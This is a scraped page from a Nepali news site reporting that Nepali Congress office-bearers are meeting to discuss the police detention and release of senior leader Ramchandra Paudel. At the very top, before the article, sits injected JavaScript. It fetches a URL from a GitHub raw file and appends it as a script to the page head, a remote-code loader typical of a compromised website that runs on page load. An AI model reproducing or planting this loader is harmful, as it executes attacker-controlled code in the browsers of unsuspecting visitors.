;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामचन्द्र पौडेललाई प्रहरीले पक्राउ गरेको विषयमा छलफल गर्न आज कांग्रेस पदादिकारी बैठक बस्दै – जुनेली न्युज
बुधबार, असार १२, २०८२
  • होमपेज
  • रामचन्द्र पौडेललाई प्रहरीले पक्राउ गरेको विषयमा छलफल गर्न आज कांग्रेस पदादिकारी बैठक बस्दै
देश/प्रदेश

रामचन्द्र पौडेललाई प्रहरीले पक्राउ गरेको विषयमा छलफल गर्न आज कांग्रेस पदादिकारी बैठक बस्दै

मंसिर १९,

काठमाडौं । नेपाली कांग्रेसको शुक्रबार पदादिकारी बैठक  बस्दैछ । बैठक सभापति शेरबहादुर देउवाले आफ्नै निवासमा बोलाएका हुन् ।

गत बुधबार आफ्ना वरिष्ठ नेता रामचन्द्र पौडेललाई प्रहरीले नियन्त्रणमा लिएको घटनाको बारेमा छलफल हुने पार्टीका सह-महामन्त्री डा. प्रकाश महतले बताए ।

नेता पौडेललाई बुधबार प्रहरीले नियन्त्रणमा लिएर तीन घण्टापछि छोडेको थियो । सोही घटनालाई लिएर कांग्रेसका विभिन्न भातृसंघ संस्थाहरुले बिरोध प्रर्दशन गरिरहेका छन् ।

फेसबुक प्रतिक्रियाहरु